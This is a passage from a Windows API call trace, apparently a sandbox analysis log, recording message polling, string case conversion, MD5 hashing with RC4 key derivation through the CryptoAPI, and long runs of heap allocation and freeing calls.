wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.392] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.392] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0252.392] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.392] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0252.392] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.393] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.393] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.393] CryptCreateHash (in: hProv=0xad31c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0252.393] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.393] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.393] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.393] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.393] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0252.393] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.393] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.393] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.393] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.394] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.394] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.394] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.394] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.394] CryptHashData (hHash=0xaa5660, pbData=0x24b1738, dwDataLen=0x3, dwFlags=0x1) returned 1 [0252.394] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.394] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.394] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.394] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.394] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.394] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.394] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.394] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.394] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0252.394] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.395] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0252.395] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.395] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.395] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.395] CryptDeriveKey (in: hProv=0xad31c0, Algid=0x6601, hBaseData=0xaa5660, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57a0) returned 1 [0252.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0252.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0252.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0252.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0252.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0252.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0252.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0252.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0252.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0252.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0252.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0252.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0252.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0252.400] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0252.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0252.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0252.401] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0252.401] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.402] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.403] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.403] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0252.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0252.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa988 [0252.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa48 [0252.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0252.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7f0 [0252.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0252.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa78 [0252.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0252.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab20 [0252.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0252.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0252.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab68 [0252.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0252.405] RtlAllocateHeap 